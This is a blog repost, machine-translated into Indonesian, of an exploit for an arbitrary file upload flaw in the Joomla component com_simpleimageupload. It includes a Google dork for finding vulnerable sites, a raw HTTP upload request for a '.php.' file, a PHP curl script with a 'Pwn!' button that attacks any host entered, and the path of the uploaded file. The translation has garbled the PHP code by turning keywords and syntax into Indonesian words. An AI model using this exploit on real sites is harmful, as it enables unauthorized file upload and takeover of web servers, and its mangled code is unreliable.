Joomla Sederhana Gambar Upload Sewenang Upload File

Simpan Postingan

# Exploit Judul: Joomla Sederhana Gambar Upload - Sewenang Upload File
# Google Dork: inurl: option = com_simpleimageupload
# Tanggal: 2015/06/23
# Exploit Penulis: CrashBandicotDosPerl
# Penjual Homepage: http://tuts4you.de/
# Software Link: http://tuts4you.de/96-development/156-simpleimageupload
# Versi: 1.0
# Diuji pada: MsWin32

# Vuln Sama untuk Com_Media Kerentanan

# Hidup Permintaan:

POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP / 1.1

Host: 127.0.0.1
User-Agent: Mozilla / 5.0 (Windows NT 6.1; rv: 31.0) Gecko / 20100101 Firefox / 31.0
Terima: text / html, aplikasi / xhtml + xml, aplikasi / xml; q = 0,9, * / *; q = 0,8
Terima-Bahasa: en-us, en; q = 0,5
Terima-Encoding: gzip, mengempis
Referer: http://127.0.0.1/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc
Koneksi: terus-hidup
Content-Type: multipart / form-data; batas = --------- 247062787817068

---------- 247062787817068 \ r \ n
Content-Disposition: form-data; name = "Filedata"; filename = "L0v3.php." \ r \ n
Content-Type: application / x-php \ r \ n
\ r \ n
0wn3d! ;) \ r \ n
---------- 247062787817068 \ r \ n
Content-Disposition: form-data; name = "kembali-url" \ r \ n
\ r \ n
aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=\r\n
---------- 247062787817068- \ r \ n

# Exploit:

<? php

gema '<form action = metode "#" = "post" enctype = "multipart / form-data">
<input type = "text" name = "target" value = "www.localhost.com" /> <input type = "submit" name = "Pwn" value = "Pwn!" />
</ form> ';

if ($ _ POST) {

$ target = $ _POST ['target'];

$ file = "0wn3d! ;) ";
$ sundulan = array ("Content-Type: application / x-php",
"Content-Disposition: form-data; name = \ "Filedata \"; file = \ "L0v3.php \." ");

$ ch = curl_init(“http://”.$target.”/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component”);
curl_setopt ($ ch, CURLOPT_POST, true);
curl_setopt ($ ch, CURLOPT_USERAGENT, "Mozilla / 5.0 (Windows NT 6.3; WOW64) AppleWebKit / 537,36 (KHTML, seperti Gecko) Chrome / Safari 43.0.2357.124 / 537,36");
curl_setopt ($ ch, CURLOPT_POSTFIELDS, array ('Filedata' => "@ $ file", "kembali-url" => “aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=”,));
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ ch, CURLOPT_HTTPHEADER, $ header);
$ hasil = curl_exec ($ ch);
curl_close ($ ch);
mencetak "$ hasil";

} Else {die (); }
?>

# Jalur File: 127.0.0.1/images/[Rand0mString]L0v3.php
# Sh00t untuk Mr_AnarShi-T;

Dork Exploitations

Oktober 10, 2015 • 0 komentar

Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.